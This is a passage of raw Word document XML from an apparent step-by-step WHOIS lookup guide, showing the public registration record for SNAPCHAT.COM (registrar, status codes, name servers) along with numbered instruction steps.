          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Registrar: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MarkMonitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Registrar IANA ID: 292</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Registrar Abuse Contact Email: abusecomplaints@markmonitor.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Registrar Abuse Contact Phone: +1.2086851750</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>clientDeleteProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#clientDeleteProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>clientTransferProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#clientTransferProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>clientUpdateProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#clientUpdateProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>serverDeleteProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#serverDeleteProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>serverTransferProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#serverTransferProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>serverUpdateProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#serverUpdateProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Name Server: NS-1468.AWSDNS-55.ORG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Name Server: NS-1892.AWSDNS-44.CO.UK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Name Server: NS-220.AWSDNS-27.COM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   Name Server: NS-530.AWSDNS-02.NET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   DNSSEC: unsigned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   URL of the ICANN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inaccuracy Complaint Form: https://www.icann.org/wicf/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style101"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; Last update of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> database: 2023-07-22T07:12:53Z &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -6 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Whois redirects to new tab </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step -7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste the domain name </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step -8</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Domain Name: SNAPCHAT.COM</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Registry Domain ID: 1704543145_DOMAIN_COM-VRSN</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Registrar WHOIS Server: whois.markmonitor.com</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Registrar URL: http://www.markmonitor.com</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Updated Date: 2018-03-28T20:34:03Z</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Creation Date: 2012-02-28T19:29:26Z</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Registry Expiry Date: 2026-02-28T19:29:26Z</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 xml:space="preserve">Registrar: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>MarkMonitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inc.</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Registrar IANA ID: 292</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Registrar Abuse Contact Email: abusecomplaints@markmonitor.com</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Registrar Abuse Contact Phone: +1.2086851750</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 xml:space="preserve">Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>clientDeleteProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#clientDeleteProhibited</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 xml:space="preserve">Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>clientTransferProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#clientTransferProhibited</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 xml:space="preserve">Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>clientUpdateProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#clientUpdateProhibited</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 xml:space="preserve">Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>serverDeleteProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#serverDeleteProhibited</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 xml:space="preserve">Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>serverTransferProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#serverTransferProhibited</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 xml:space="preserve">Domain Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>serverUpdateProhibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://icann.org/epp#serverUpdateProhibited</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Name Server: NS-1468.AWSDNS-55.ORG</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Name Server: NS-1892.AWSDNS-44.CO.UK</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Name Server: NS-220.AWSDNS-27.COM</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Name Server: NS-530.AWSDNS-02.NET</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DNSSEC: unsigned</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 xml:space="preserve">URL of the ICANN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inaccuracy Complaint Form: https://www.icann.org/wicf/</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 xml:space="preserve">&gt;&gt;&gt; Last update of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> database: 2023-07-22T07:18:39Z &lt;&lt;&lt;</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 xml:space="preserve">For more information on </w:t>
